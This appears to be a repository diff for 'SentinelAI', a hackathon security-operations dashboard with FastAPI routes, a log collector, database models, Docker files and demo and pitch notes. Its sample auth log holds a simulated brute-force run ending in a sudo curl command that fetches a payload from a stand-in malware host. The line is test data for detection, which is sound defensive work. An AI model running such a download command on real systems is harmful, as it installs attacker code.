            async def metrics_tick() -> None:
                # Roll the frequency counters forward once per minute, forever.
                while True:
                    await asyncio.sleep(60)
                    metrics.tick_frequency()

            asyncio.create_task(metrics_tick())
            logger.info("Background SOC wiring scheduled (Redis, DB, LangGraph, collectors)")
        except Exception:
            logger.exception("Background startup failed")

    asyncio.create_task(background_startup())
    logger.info(
        "HTTP layer ready — GET /health while Redis, PostgreSQL, LangGraph, and collectors initialize in the background"
    )
    yield
    # Shutdown: cancel collector tasks if they were ever wired.
    if services.collector is not None:
        services.collector.stop()
166
+
167
+
168
app = FastAPI(title="SentinelAI SOC API", version="1.0.0", lifespan=lifespan)
# CORS origins come from CORS_ORIGINS (comma-separated), defaulting to "*".
# NOTE(review): browsers reject allow_credentials=True combined with a
# wildcard origin — set explicit origins for production deployments.
app.add_middleware(
    CORSMiddleware,
    allow_origins=os.getenv("CORS_ORIGINS", "*").split(","),
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
176
+
177
+
178
async def get_session():
    """FastAPI dependency yielding an async DB session, or None when SKIP_DB is set.

    Routes must therefore tolerate ``session is None`` (memory-only mode).
    """
    if os.getenv("SKIP_DB", "").lower() in {"1", "true", "yes"}:
        yield None
        return
    from database.session import async_session_factory  # defer heavy SQLAlchemy/asyncpg import

    async with async_session_factory() as session:
        yield session
186
+
187
+
188
@app.post("/ingest-logs")
async def ingest_logs(body: RawLogIngest, pipeline: PipelineDep, session: Any = Depends(get_session)):
    """Ingest a raw log line through the full SOC pipeline."""
    return await pipeline.ingest(body, session)
191
+
192
+
193
@app.websocket("/live-events")
async def live_events(ws: WebSocket) -> None:
    """Stream live SOC frames to a WebSocket client.

    On connect, replays up to 80 buffered feed rows, then idles: each client
    message resets a 20s timer, and on timeout a heartbeat frame is sent so
    idle connections are not dropped by intermediaries.

    Fix: the original called ``hub.disconnect(ws)`` in both the
    ``except WebSocketDisconnect`` branch AND the ``finally`` block, so a
    normal client hang-up triggered cleanup twice; cleanup now happens
    exactly once, in ``finally``.
    """
    await hub.connect(ws)
    try:
        for row in list(hub.live_feed)[:80]:
            await ws.send_json(row)
        while True:
            try:
                await asyncio.wait_for(ws.receive_text(), timeout=20.0)
            except asyncio.TimeoutError:
                await ws.send_json({"type": "heartbeat", "ts": time.time()})
    except WebSocketDisconnect:
        # Normal client hang-up — nothing extra to do; ``finally`` cleans up.
        pass
    finally:
        hub.disconnect(ws)
208
+
209
+
210
@app.post("/detect-threats")
async def detect_threats(body: RawLogIngest, pipeline: PipelineDep, session: Any = Depends(get_session)):
    """Alias of /ingest-logs: detection runs as part of the same ingest pipeline."""
    return await pipeline.ingest(body, session)
213
+
214
+
215
@app.post("/correlate-incidents")
async def correlate_incidents(pipeline: PipelineDep):
    """Re-run incident correlation over the pipeline's in-memory events/findings."""
    from agents.incident_correlation_agent import correlate

    # Private pipeline state is read deliberately here (noqa: SLF001).
    incidents = correlate(pipeline._events, pipeline._findings)  # noqa: SLF001
    return {"incidents": [i.model_dump(mode="json") for i in incidents]}
221
+
222
+
223
@app.post("/generate-summary")
async def generate_summary(body: IncidentActionBody, pipeline: PipelineDep, session: Any = Depends(get_session)):
    """Run the full analyst workflow for one incident and return its payload."""
    return await pipeline.run_full_workflow_on_incident(body.incident_id, session)
226
+
227
+
228
@app.post("/remediation")
async def remediation(body: IncidentActionBody, pipeline: PipelineDep, session: Any = Depends(get_session)):
    """Run the full workflow but return only the remediation plan portion."""
    payload = await pipeline.run_full_workflow_on_incident(body.incident_id, session)
    return {"remediation": payload.get("remediation")}
232
+
233
+
234
@app.post("/send-alert")
async def send_alert_endpoint(body: AlertPayload, session: Any = Depends(get_session)):
    """Dispatch an alert via the alerting agent; persist it when a DB session exists."""
    from agents.alerting_agent import send_alert as _send
    from database.models import AlertRecord

    result = await _send(body)
    if session is not None:
        # SKIP_DB mode yields session=None: the alert is sent but not recorded.
        session.add(
            AlertRecord(
                channel=body.channel,
                title=body.title,
                body=body.body,
                severity=body.severity.value,
            )
        )
        await session.commit()
    return result
251
+
252
+
253
@app.get("/dashboard-metrics")
async def dashboard_metrics() -> DashboardMetrics:
    """Return the current metrics snapshot shaped as DashboardMetrics."""
    snap = metrics.snapshot()
    return DashboardMetrics(**snap)
257
+
258
+
259
@app.get("/rocm-panel")
async def rocm_panel():
    """AMD ROCm story + demo inference/agent load (simulated GPU sway for UI)."""
    return metrics.rocm_panel()
263
+
264
+
265
@app.get("/agent-activity")
async def agent_activity():
    """Most recent agent activity log entries (up to 200)."""
    return {"items": list(hub.agent_log)[:200]}
268
+
269
+
270
@app.post("/replay/start")
async def replay_start(body: ReplayStartBody = ReplayStartBody()):
    """Replay buffered threat_feed / detection / incident frames to all WebSocket clients."""
    # Default body instance lets clients POST with an empty payload.
    hub.schedule_replay(delay_ms=body.delay_ms)
    return {"status": "scheduled", "delay_ms": body.delay_ms, "buffered": len(hub.replay_buffer)}
275
+
276
+
277
@app.get("/replay-buffer")
async def replay_buffer():
    """Inspect the frames currently queued for replay."""
    return {"count": len(hub.replay_buffer), "items": list(hub.replay_buffer)}
280
+
281
+
282
@app.get("/")
async def root():
    """Landing hint — FastAPI did not define `/` before; browsers hitting only the host saw 404."""
    # Static discovery payload pointing at the useful entry points.
    links = {
        "docs": "/docs",
        "health": "/health",
        "openapi_json": "/openapi.json",
    }
    return {"service": "SentinelAI SOC API", **links}
291
+
292
+
293
@app.get("/health")
async def health():
    """Liveness probe: static payload, independent of background wiring state."""
    payload = {"status": "ok", "service": "sentinelai"}
    return payload
296
+
297
+
298
@app.get("/workflow-state")
async def workflow_state(pipeline: PipelineDep) -> WorkflowState:
    """Snapshot of recent pipeline state: last 50 events, 100 findings, 20 incidents."""
    return WorkflowState(
        events=pipeline._events[-50:],  # noqa: SLF001
        findings=pipeline._findings[-100:],  # noqa: SLF001
        incidents=pipeline._incidents[-20:],  # noqa: SLF001
    )
collectors/__init__.py ADDED
@@ -0,0 +1 @@
 
 
1
+ """Log and telemetry collectors."""
collectors/collector_agent.py ADDED
@@ -0,0 +1,147 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Autonomous collector agent: async directory tail + explicit Linux auth.log paths."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import asyncio
6
+ import logging
7
+ import os
8
+ from pathlib import Path
9
+ from typing import Awaitable, Callable
10
+
11
+ from models.schemas import RawLogIngest
12
+
13
+ logger = logging.getLogger("sentinelai.collector")
14
+
15
+ EmitFn = Callable[[RawLogIngest], Awaitable[None]]
16
+
17
+
18
class CollectorAgent:
    """Runs background collectors and pushes RawLogIngest to the pipeline."""

    def __init__(self, emit: EmitFn) -> None:
        # emit: async callback that hands each RawLogIngest to the pipeline.
        self.emit = emit
        # Background asyncio tasks owned by this agent; cancelled in stop().
        self._tasks: list[asyncio.Task] = []
        # Last-read byte offset per file path so re-polls only emit new lines.
        self._file_positions: dict[str, int] = {}

    def start_all_tails(self) -> None:
        """Watch demo directory plus optional explicit files (e.g. /var/log/auth.log)."""
        self.start_file_tail()
        extra: list[str] = []
        # COLLECTOR_FILE_PATHS: comma-separated extra files to tail.
        raw_paths = os.getenv("COLLECTOR_FILE_PATHS", "")
        extra.extend(p.strip() for p in raw_paths.split(",") if p.strip())
        if os.getenv("COLLECT_AUTH_LOG", "").lower() in {"1", "true", "yes"}:
            # Opt-in auth.log tailing; AUTH_LOG_PATH overrides the default path.
            auth = os.getenv("AUTH_LOG_PATH", "/var/log/auth.log").strip()
            if auth:
                extra.append(auth)
        else:
            # Even without the opt-in flag, an explicit AUTH_LOG_PATH is honored.
            auth_only = os.getenv("AUTH_LOG_PATH", "").strip()
            if auth_only:
                extra.append(auth_only)
        # De-duplicate while preserving order before spawning tail tasks.
        seen: set[str] = set()
        for p in extra:
            if p in seen:
                continue
            seen.add(p)
            self._start_single_file_tail(Path(p))

    def start_file_tail(self, watch_dir: str | None = None) -> None:
        """Poll a whole directory tree for new log lines (demo_logs by default)."""
        base = Path(watch_dir or os.getenv("COLLECTOR_WATCH_DIR", "./demo_logs"))
        base.mkdir(parents=True, exist_ok=True)

        async def tail_loop() -> None:
            # Simple polling loop; COLLECTOR_POLL_SEC controls the cadence.
            while True:
                await self._drain_directory(base, source="file")
                await asyncio.sleep(float(os.getenv("COLLECTOR_POLL_SEC", "1.0")))

        self._tasks.append(asyncio.create_task(tail_loop()))
        logger.info("Async file collector tailing directory %s", base)

    def _start_single_file_tail(self, path: Path) -> None:
        """Tail one explicit file, waiting (with a one-time warning) if it is missing."""

        async def tail_one() -> None:
            warned = False
            while True:
                if not path.is_file():
                    # Warn once, then retry quietly until the file appears.
                    if not warned:
                        logger.warning("Collector waiting for file %s (missing or not readable yet)", path)
                        warned = True
                    await asyncio.sleep(float(os.getenv("COLLECTOR_MISSING_RETRY_SEC", "10")))
                    continue
                warned = False
                key = str(path.resolve())
                try:
                    with path.open("r", encoding="utf-8", errors="ignore") as f:
                        # Resume from the last emitted offset.
                        f.seek(self._file_positions.get(key, 0))
                        for line in f:
                            line = line.strip()
                            if line:
                                await self.emit(
                                    RawLogIngest(
                                        source="linux_auth" if "auth.log" in path.name else "file",
                                        raw_line=line,
                                        metadata={"path": key, "host": os.getenv("COLLECTOR_HOSTNAME", "linux-host")},
                                    )
                                )
                        self._file_positions[key] = f.tell()
                except OSError as e:
                    # Transient read failures (rotation, permissions) are skipped.
                    logger.debug("tail skip %s: %s", path, e)
                await asyncio.sleep(float(os.getenv("COLLECTOR_POLL_SEC", "1.0")))

        self._tasks.append(asyncio.create_task(tail_one()))
        logger.info("Async file collector tailing file %s", path)

    async def _drain_directory(self, base: Path, source: str) -> None:
        """Emit new lines from every .log/.txt/extensionless file under ``base``."""
        for path in sorted(base.rglob("*")):
            if not path.is_file():
                continue
            if path.suffix not in {".log", ".txt", ""}:
                continue
            key = str(path)
            try:
                with path.open("r", encoding="utf-8", errors="ignore") as f:
                    f.seek(self._file_positions.get(key, 0))
                    for line in f:
                        line = line.strip()
                        if line:
                            await self.emit(
                                RawLogIngest(
                                    source=source,
                                    raw_line=line,
                                    metadata={"path": key, "host": os.getenv("COLLECTOR_HOSTNAME", "edge-01")},
                                )
                            )
                    self._file_positions[key] = f.tell()
            except OSError as e:
                logger.debug("tail skip %s: %s", path, e)

    def stop(self) -> None:
        # Cancel all background tail/poll tasks (called on app shutdown).
        for t in self._tasks:
            t.cancel()

    def start_mock_cloud_poll(self) -> None:
        """Emit a canned CloudTrail-style event every 30s (demo data source)."""

        async def poll() -> None:
            while True:
                await asyncio.sleep(30)
                await self.emit(
                    RawLogIngest(
                        source="cloudtrail_mock",
                        raw_line='{"event_type":"api.unusual","source_ip":"203.0.113.50","host":"aws","severity":"medium","message":"AssumeRole spike"}',
                        metadata={"host": "aws-control-plane"},
                    )
                )

        self._tasks.append(asyncio.create_task(poll()))

    async def docker_stream_sample(self) -> None:
        """One-shot sample of the last 5 log lines from up to 3 running containers.

        Silently does nothing when the docker SDK is not installed.
        """
        try:
            import docker  # type: ignore
        except ImportError:
            return
        client = docker.from_env()
        for c in client.containers.list()[:3]:
            try:
                for line in c.logs(stream=False, tail=5).decode(errors="ignore").splitlines():
                    await self.emit(
                        RawLogIngest(source="docker", raw_line=line, metadata={"container": c.short_id})
                    )
            except Exception as e:  # noqa: BLE001
                logger.debug("docker log: %s", e)
components/.gitkeep ADDED
File without changes
database/__init__.py ADDED
@@ -0,0 +1 @@
 
 
1
+ """Persistence layer."""
database/models.py ADDED
@@ -0,0 +1,61 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """SQLAlchemy ORM models for PostgreSQL."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import uuid
6
+ from datetime import datetime, timezone
7
+
8
+ from sqlalchemy import JSON, DateTime, Float, Integer, String, Text
9
+ from sqlalchemy.dialects.postgresql import UUID
10
+ from sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column
11
+
12
+
13
class Base(DeclarativeBase):
    """Shared declarative base for all SentinelAI ORM models."""
    pass
15
+
16
+
17
class EventRecord(Base):
    """Normalized security event persisted for audit/replay."""

    __tablename__ = "events"

    id: Mapped[uuid.UUID] = mapped_column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
    timestamp: Mapped[datetime] = mapped_column(DateTime(timezone=True))  # event time (tz-aware)
    event_type: Mapped[str] = mapped_column(String(128))
    source_ip: Mapped[str | None] = mapped_column(String(64), nullable=True)
    host: Mapped[str] = mapped_column(String(256), default="unknown")
    severity: Mapped[str] = mapped_column(String(32))
    payload: Mapped[dict] = mapped_column(JSON, default=dict)  # full event body as JSON
    created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))
28
+
29
+
30
class IncidentRecord(Base):
    """Correlated incident with its node/edge graph and risk score."""

    __tablename__ = "incidents"

    id: Mapped[uuid.UUID] = mapped_column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
    title: Mapped[str] = mapped_column(String(512))
    summary: Mapped[str] = mapped_column(Text)
    graph: Mapped[dict] = mapped_column(JSON, default=dict)  # nodes/edges/timeline as JSON
    risk_score: Mapped[float] = mapped_column(Float, default=0)
    severity: Mapped[str] = mapped_column(String(32))
    created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))
40
+
41
+
42
class AlertRecord(Base):
    """Outbound alert as dispatched by the alerting agent."""

    __tablename__ = "alerts"

    id: Mapped[uuid.UUID] = mapped_column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
    channel: Mapped[str] = mapped_column(String(64))  # delivery channel identifier
    title: Mapped[str] = mapped_column(String(512))
    body: Mapped[str] = mapped_column(Text)
    severity: Mapped[str] = mapped_column(String(32))
    incident_id: Mapped[uuid.UUID | None] = mapped_column(UUID(as_uuid=True), nullable=True)  # optional link
    created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))
52
+
53
+
54
class MetricSnapshot(Base):
    """Point-in-time counters for the dashboard metrics history."""

    __tablename__ = "metric_snapshots"

    id: Mapped[int] = mapped_column(Integer, primary_key=True, autoincrement=True)
    threats_detected: Mapped[int] = mapped_column(Integer, default=0)
    active_incidents: Mapped[int] = mapped_column(Integer, default=0)
    blocked: Mapped[int] = mapped_column(Integer, default=0)
    recorded_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(timezone.utc))
database/session.py ADDED
@@ -0,0 +1,35 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
"""Async database session factory."""

from __future__ import annotations

import os

from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker, create_async_engine
from sqlalchemy.pool import NullPool

from database.models import Base

# Connection URL; overridable via env for Docker/compose deployments.
DATABASE_URL = os.getenv(
    "DATABASE_URL",
    "postgresql+asyncpg://sentinel:sentinel@localhost:5432/sentinelai",
)

_DEFAULT_CONNECT_TIMEOUT_SEC = 10.0


def _build_connect_args() -> dict:
    """Driver-specific connect arguments.

    For asyncpg-backed Postgres URLs we pass a connect ``timeout``. The env
    override is parsed defensively: a malformed ``DB_CONNECT_TIMEOUT_SEC``
    previously raised ``ValueError`` at import time and crashed startup; now
    it falls back to the default instead.
    """
    args: dict = {}
    if "postgresql" in DATABASE_URL and "asyncpg" in DATABASE_URL:
        raw = os.getenv("DB_CONNECT_TIMEOUT_SEC", str(_DEFAULT_CONNECT_TIMEOUT_SEC))
        try:
            args["timeout"] = float(raw)
        except ValueError:
            args["timeout"] = _DEFAULT_CONNECT_TIMEOUT_SEC
    return args


# NullPool: a fresh connection per checkout — avoids reusing async connections
# across event loops (e.g. under test runners or multiple workers).
engine = create_async_engine(
    DATABASE_URL,
    echo=False,
    poolclass=NullPool,
    # Was ``_connect_args or {}`` — redundant, since the helper always returns a dict.
    connect_args=_build_connect_args(),
)

# Sessions keep loaded attributes usable after commit (expire_on_commit=False).
async_session_factory = async_sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)


async def init_db() -> None:
    """Create all tables, unless SKIP_DB disables database access (demo mode)."""
    if os.getenv("SKIP_DB", "").lower() in {"1", "true", "yes"}:
        return
    async with engine.begin() as conn:
        await conn.run_sync(Base.metadata.create_all)
demo_logs/auth_demo.log ADDED
@@ -0,0 +1,7 @@
 
 
 
 
 
 
 
 
1
+ Jan 10 10:01:02 edge-01 sshd[1200]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
2
+ Jan 10 10:01:05 edge-01 sshd[1201]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
3
+ Jan 10 10:01:08 edge-01 sshd[1202]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
4
+ Jan 10 10:01:11 edge-01 sshd[1203]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
5
+ Jan 10 10:01:14 edge-01 sshd[1204]: Failed password for invalid user admin from 185.220.101.1 port 22 ssh2
6
+ Jan 10 10:01:20 edge-01 sshd[1205]: Accepted publickey for ubuntu from 185.220.101.1 port 22 ssh2
7
+ Jan 10 10:01:45 edge-01 sudo: ubuntu : TTY=pts/0 ; USER=root ; COMMAND=/usr/bin/curl -fsSL http://malware.test/payload -o /tmp/.cache
docker/Dockerfile.backend ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
# SentinelAI control plane — use ROCm-enabled hosts for GPU inference (see README).
FROM python:3.12-slim

# No .pyc files, unbuffered logs; PYTHONPATH lets `backend.app.main` resolve from /app.
ENV PYTHONDONTWRITEBYTECODE=1 \
    PYTHONUNBUFFERED=1 \
    PYTHONPATH=/app

WORKDIR /app

# Compiler toolchain + Postgres client headers — presumably required to build
# DB driver wheels from source when no binary wheel matches (TODO confirm
# against requirements.txt).
RUN apt-get update && apt-get install -y --no-install-recommends \
    build-essential \
    libpq-dev \
    && rm -rf /var/lib/apt/lists/*

# Install dependencies before copying the source tree so the pip layer is
# cached across code-only edits.
COPY requirements.txt /app/requirements.txt
RUN pip install --no-cache-dir -r /app/requirements.txt

COPY . /app

EXPOSE 8000
CMD ["uvicorn", "backend.app.main:app", "--host", "0.0.0.0", "--port", "8000"]
docker/Dockerfile.frontend ADDED
@@ -0,0 +1,22 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
# Three-stage build: deps (npm ci) -> builder (next build) -> runtime image.
FROM node:22-alpine AS deps
WORKDIR /app
COPY frontend/package.json frontend/package-lock.json ./
RUN npm ci

FROM node:22-alpine AS builder
WORKDIR /app
COPY --from=deps /app/node_modules ./node_modules
COPY frontend ./
ENV NEXT_TELEMETRY_DISABLED=1
RUN npm run build

FROM node:22-alpine AS runner
WORKDIR /app
ENV NODE_ENV=production
ENV NEXT_TELEMETRY_DISABLED=1
# NOTE(review): next.config.* is not copied into this stage — confirm `next start`
# does not need it at runtime for this app before shipping.
COPY --from=builder /app/.next ./.next
COPY --from=builder /app/public ./public
COPY --from=builder /app/package.json ./
COPY --from=builder /app/node_modules ./node_modules
EXPOSE 3000
# Flags after `--` are forwarded by npm to `next start`.
CMD ["npm", "run", "start", "--", "-H", "0.0.0.0", "-p", "3000"]
docker/docker-compose.yml ADDED
@@ -0,0 +1,69 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
# Local development stack: Postgres + Redis + backend API + frontend UI.
services:
  postgres:
    image: postgres:16-alpine
    environment:
      POSTGRES_USER: sentinel
      POSTGRES_PASSWORD: sentinel
      POSTGRES_DB: sentinelai
    ports:
      - "5432:5432"
    volumes:
      - pgdata:/var/lib/postgresql/data
    healthcheck:
      # Backend startup is gated on this (see depends_on.condition below).
      test: ["CMD-SHELL", "pg_isready -U sentinel -d sentinelai"]
      interval: 5s
      timeout: 5s
      retries: 10

  redis:
    image: redis:7-alpine
    ports:
      - "6379:6379"

  backend:
    build:
      context: ..
      dockerfile: docker/Dockerfile.backend
    environment:
      DATABASE_URL: postgresql+asyncpg://sentinel:sentinel@postgres:5432/sentinelai
      REDIS_URL: redis://redis:6379/0
      CORS_ORIGINS: http://localhost:3000
      COLLECTOR_WATCH_DIR: /app/demo_logs
      # Points at the optional ollama service below; unresolved while that
      # service stays commented out.
      OLLAMA_HOST: http://ollama:11434
      ENABLE_MOCK_CLOUD_POLL: "1"
    ports:
      - "8000:8000"
    depends_on:
      postgres:
        condition: service_healthy
      redis:
        condition: service_started
    volumes:
      # Bind-mount demo logs so newly appended lines reach the collector.
      - ../demo_logs:/app/demo_logs

  frontend:
    build:
      context: ..
      dockerfile: docker/Dockerfile.frontend
    environment:
      # Browser-facing URL — must be reachable from the host, not the compose network.
      NEXT_PUBLIC_API_URL: http://localhost:8000
    ports:
      - "3000:3000"
    depends_on:
      - backend

  # Optional: attach AMD ROCm Ollama for local Llama 3 / Qwen / Mistral inference.
  # Use a ROCm-tagged Ollama image on Linux hosts with AMD GPUs.
  # ollama:
  #   image: ollama/ollama:rocm
  #   devices:
  #     - /dev/kfd
  #     - /dev/dri
  #   ports:
  #     - "11434:11434"
  #   volumes:
  #     - ollama:/root/.ollama

volumes:
  pgdata: {}
  # ollama: {}
docs/DEMO_SCRIPT.md ADDED
@@ -0,0 +1,52 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # SentinelAI — Judge Demo Script (do not improvise)
2
+
3
+ ## Preconditions (2 minutes before)
4
+
5
+ 1. Terminal A — API:
6
+ `cd SentinelAI && source .venv/bin/activate && export PYTHONPATH=$PWD && export SKIP_DB=1`
7
+ `uvicorn backend.app.main:app --host 0.0.0.0 --port 8000`
8
+ 2. Terminal B — UI:
9
+ `cd SentinelAI/frontend && NEXT_PUBLIC_API_URL=http://127.0.0.1:8000 npm run dev`
10
+ 3. Open dashboard at `http://localhost:3000` (or your dev URL).
11
+
12
+ ## The flow (≈3–4 minutes)
13
+
14
+ 1. **Start continuous simulation**
15
+ Terminal C: `python scripts/continuous_demo.py`
16
+ Say: *“This is autonomous traffic — no manual log upload.”*
17
+
18
+ 2. **Live stream**
19
+ Point at **Live Threat Feed** and **terminal strip**.
20
+ Say: *“Collector → parser → enrichment → detection — everything is event-driven.”*
21
+
22
+ 3. **Threat detected**
23
+ When **detection** rows appear with severity, say: *“Rules + sliding windows — brute-force and post-auth patterns.”*
24
+
25
+ 4. **Incident chain**
26
+ Point at **Attack Timeline** when an incident appears.
27
+ Say: *“Correlation fuses events by source into one narrative.”*
28
+
29
+ 5. **AI investigation**
30
+    Wait for **AI Investigation** to populate (auto-runs after an incident; allow up to ~`AUTO_AI_MIN_SEC` seconds between runs).
31
+ Say: *“Analyst layer — progression, severity rationale, remediation bullets — local Llama/Qwen on AMD ROCm when configured.”*
32
+
33
+ 6. **WOW — Replay**
34
+ Click **Replay last chain**.
35
+ Say: *“We’re re-streaming the buffered kill chain for the jury — same detections and AI report, cinematic replay.”*
36
+
37
+ 7. **Remediation**
38
+ Scroll AI panel for **Recommended actions** (or call `POST /remediation` with `incident_id` if you show API).
39
+ Say: *“Playbooks block IOCs, rotate creds, harden IAM.”*
40
+
41
+ 8. **AMD story**
42
+    Point at **Powered by AMD ROCm** panel (GPU %, latency, and concurrent-agent counts are simulated demo metrics).
43
+ Say: *“Open weights, on-prem, parallel agents — ROCm is our inference path for SOC-scale throughput.”*
44
+
45
+ ## Optional soak test (10–15 minutes)
46
+
47
+ - Leave `continuous_demo.py` running; confirm API stays up, WebSocket shows heartbeats, UI stays responsive.
48
+ - If the LLM is down, narratives still read well — **cinematic fallback** is always on.
49
+
50
+ ## Backup
51
+
52
+ - If live demo fails: use your **screen recording** (see `docs/RECORDING_CHECKLIST.md`).
docs/PITCH.md ADDED
@@ -0,0 +1,28 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # SentinelAI — One-line positioning
2
+
3
+ **Do not say:** “AI cybersecurity dashboard.”
4
+
5
+ **Do say:**
6
+
7
+ > SentinelAI is an **autonomous multi-agent AI Security Operations Center** that continuously monitors infrastructure, correlates attacks, performs **AI-driven investigations**, and generates **remediation workflows** using **AMD-accelerated open-source AI** infrastructure.
8
+
9
+ ## 30-second version
10
+
11
+ - **Autonomous collectors** tail auth and demo logs (extend to Docker/K8s/cloud).
12
+ - **Detection** — brute-force, privilege abuse, malicious-source hits.
13
+ - **Correlation** — timelines and graphs, not isolated alerts.
14
+ - **AI analyst** — enterprise narratives, severity reasoning, action list (Ollama / vLLM / ROCm).
15
+ - **Command deck** — live feed, replay, ROCm panel, agent activity.
16
+
17
+ ## Why judges care
18
+
19
+ | Angle | Hook |
20
+ |--------|------|
21
+ | **Autonomy** | Runs without chat prompts; event pipeline drives agents. |
22
+ | **Multi-agent** | Collectors, detection, correlation, analyst, remediation, alerts. |
23
+ | **Data residency** | Local open models — no mandatory third-party LLM API. |
24
+ | **AMD** | ROCm = throughput for concurrent SOC reasoning at hackathon cost. |
25
+
26
+ ## Closing
27
+
28
+ “We’re not a chatbot bolted onto logs — we’re a **mini-SOC runtime** you can demo in minutes and extend to real auth.log and TI feeds.”
docs/RECORDING_CHECKLIST.md ADDED
@@ -0,0 +1,26 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Backup demo video — recording checklist
2
+
3
+ Record **even if** the live pitch will be live. Judges forgive a short clip if Wi‑Fi dies.
4
+
5
+ ## Capture (3–5 minutes total)
6
+
7
+ - [ ] Terminal: `uvicorn` + `continuous_demo.py` visible or mentioned.
8
+ - [ ] Browser: **Live Threat Feed** scrolling with detections.
9
+ - [ ] **Attack Timeline** with at least one incident.
10
+ - [ ] **AI Investigation** filled (narrative + recommended actions).
11
+ - [ ] Click **Replay last chain** — show replay badges on rows.
12
+ - [ ] Pan to **Powered by AMD ROCm** panel.
13
+ - [ ] Optional: quick flash of `POST /ingest-logs` or OpenAPI `/docs`.
14
+
15
+ ## Technical tips
16
+
17
+ - **Resolution:** 1920×1080, 30fps minimum.
18
+ - **Audio:** short voiceover OR captions (OBS / QuickTime + captions in post).
19
+ - **No secrets:** blur `.env`, webhooks, API keys if shown.
20
+ - **File name:** `SentinelAI-demo-backup-YYYY-MM-DD.mp4`
21
+
22
+ ## Where to use it
23
+
24
+ - Submission “demo video” field
25
+ - Slide deck embed
26
+ - Social / portfolio clip
frontend/.gitignore ADDED
@@ -0,0 +1,41 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # See https://help.github.com/articles/ignoring-files/ for more about ignoring files.
2
+
3
+ # dependencies
4
+ /node_modules
5
+ /.pnp
6
+ .pnp.*
7
+ .yarn/*
8
+ !.yarn/patches
9
+ !.yarn/plugins
10
+ !.yarn/releases
11
+ !.yarn/versions
12
+
13
+ # testing
14
+ /coverage
15
+
16
+ # next.js
17
+ /.next/
18
+ /out/
19
+
20
+ # production
21
+ /build
22
+
23
+ # misc
24
+ .DS_Store
25
+ *.pem
26
+
27
+ # debug
28
+ npm-debug.log*
29
+ yarn-debug.log*
30
+ yarn-error.log*
31
+ .pnpm-debug.log*
32
+
33
+ # env files (can opt-in for committing if needed)
34
+ .env*
35
+
36
+ # vercel
37
+ .vercel
38
+
39
+ # typescript
40
+ *.tsbuildinfo
41
+ next-env.d.ts
frontend/.nvmrc ADDED
@@ -0,0 +1 @@
 
 
1
+ 22
frontend/README.md ADDED
@@ -0,0 +1,36 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ This is a [Next.js](https://nextjs.org) project bootstrapped with [`create-next-app`](https://nextjs.org/docs/app/api-reference/cli/create-next-app).
2
+
3
+ ## Getting Started
4
+
5
+ First, run the development server:
6
+
7
+ ```bash
8
+ npm run dev
9
+ # or
10
+ yarn dev
11
+ # or
12
+ pnpm dev
13
+ # or
14
+ bun dev
15
+ ```
16
+
17
+ Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.
18
+
19
+ You can start editing the page by modifying `app/page.tsx`. The page auto-updates as you edit the file.
20
+
21
+ This project uses [`next/font`](https://nextjs.org/docs/app/building-your-application/optimizing/fonts) to automatically optimize and load [Geist](https://vercel.com/font), a new font family for Vercel.
22
+
23
+ ## Learn More
24
+
25
+ To learn more about Next.js, take a look at the following resources:
26
+
27
+ - [Next.js Documentation](https://nextjs.org/docs) - learn about Next.js features and API.
28
